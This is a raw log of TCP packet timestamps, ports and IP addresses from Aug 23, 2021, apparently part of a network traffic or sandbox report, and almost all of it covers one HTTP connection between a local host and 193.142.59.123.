Aug 23, 2021 02:08:02.555022001 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.555038929 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.555052042 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.555072069 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.555095911 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.555141926 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.555162907 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.555186033 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.555222034 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.555254936 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.555258989 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.555263042 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.555265903 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.555269957 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.555274010 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.556265116 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586133003 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586155891 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586172104 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586304903 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586307049 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586334944 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586349964 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586354971 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586368084 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586386919 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586395025 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586405993 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586430073 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586436033 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586462975 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586477995 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586483955 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586504936 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586519957 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586532116 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586546898 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586570978 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586575985 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586592913 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586612940 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586621046 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586636066 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586653948 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586661100 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586677074 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586692095 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586695910 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586707115 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586733103 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586735964 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586750984 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586766005 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586771011 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586783886 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586800098 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586802006 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586829901 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586839914 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586844921 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586860895 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586875916 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586883068 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586890936 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586915970 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.586935043 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586960077 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586976051 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.586993933 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.587018013 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.587249994 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.587269068 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.587316990 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.587335110 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.587347031 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.587377071 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.618032932 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618140936 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618179083 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618215084 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618285894 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.618320942 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.618473053 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618520975 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618557930 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618558884 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.618592978 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618628025 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618632078 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.618664026 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618696928 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618701935 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.618732929 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618767023 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618768930 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.618810892 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618849993 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618850946 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.618884087 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618918896 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618918896 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.618953943 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618987083 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.618993044 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.619023085 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619057894 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619059086 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.619101048 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619141102 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.619179964 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619220972 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619256973 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619257927 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.619292021 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619326115 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619329929 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.619385004 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619420052 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.619424105 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619458914 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619493961 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.619497061 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619577885 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619616032 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.619657040 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619730949 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619770050 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.619810104 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619846106 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619893074 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619896889 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.619930029 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619963884 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.619972944 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.619999886 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.620034933 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.620039940 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.620079041 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.620119095 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.620121002 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.620161057 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.620202065 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.620207071 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.620273113 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.620312929 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.620313883 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.620347977 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.620402098 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.651382923 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651429892 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651451111 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651485920 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.651492119 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651527882 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.651530027 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651570082 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651607037 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.651607037 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651638031 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651659966 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651674032 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.651705980 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651741028 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651743889 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.651763916 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651803017 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651809931 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.651825905 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651851892 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651861906 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.651875019 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651896000 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651911974 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.651917934 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651941061 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651957989 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.651962996 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651985884 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.651995897 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652007103 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652030945 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652049065 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652054071 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652075052 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652095079 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652096987 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652118921 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652129889 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652141094 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652164936 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652173996 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652192116 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652225971 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652242899 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652266026 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652302027 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652306080 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652333975 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652359009 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652368069 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652395964 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652417898 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652440071 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652441978 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652478933 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652479887 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652502060 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652529001 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652553082 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652559996 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652575970 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652599096 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652600050 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652622938 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652645111 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652646065 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.652668953 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.652683973 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.684055090 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684148073 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.684256077 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684360981 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684410095 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.684454918 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684537888 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684576035 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.684645891 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684693098 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684726954 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.684736967 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684782028 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684813023 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684818029 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.684858084 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684894085 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.684901953 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684953928 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.684989929 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.684998035 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685040951 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685075998 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.685085058 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685127974 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685168028 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.685203075 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685283899 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685323000 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.685363054 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685408115 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685447931 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.685457945 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685506105 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685543060 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.685549021 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685594082 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685630083 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.685636044 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685682058 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685724974 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685741901 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.685767889 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685806990 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.685836077 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685885906 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685931921 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.685951948 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.685973883 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686013937 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.686018944 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686062098 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686104059 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686113119 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.686147928 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686184883 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.686192989 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686244965 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686281919 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.686290026 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686335087 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686382055 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686384916 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.686430931 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686472893 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686475039 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.686515093 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686553001 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.686558962 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686609983 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686650991 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.686687946 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686762094 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686805010 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.686816931 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686880112 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686918020 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.686920881 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.686965942 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687005043 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.687006950 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687066078 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687109947 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687110901 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.687186003 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687244892 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687254906 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.687275887 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687309027 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687321901 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.687340021 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687377930 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687403917 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.687413931 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687444925 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687458992 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.687477112 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687510014 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687520027 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.687541962 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687573910 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687578917 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.687604904 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687639952 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.687644005 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687679052 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687710047 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687731028 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.687742949 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687767982 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:02.687804937 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:02.695209026 CEST	80	49713	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:02.752398968 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:03.220191002 CEST	49717	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:03.505687952 CEST	80	49717	222.236.49.124	192.168.2.3
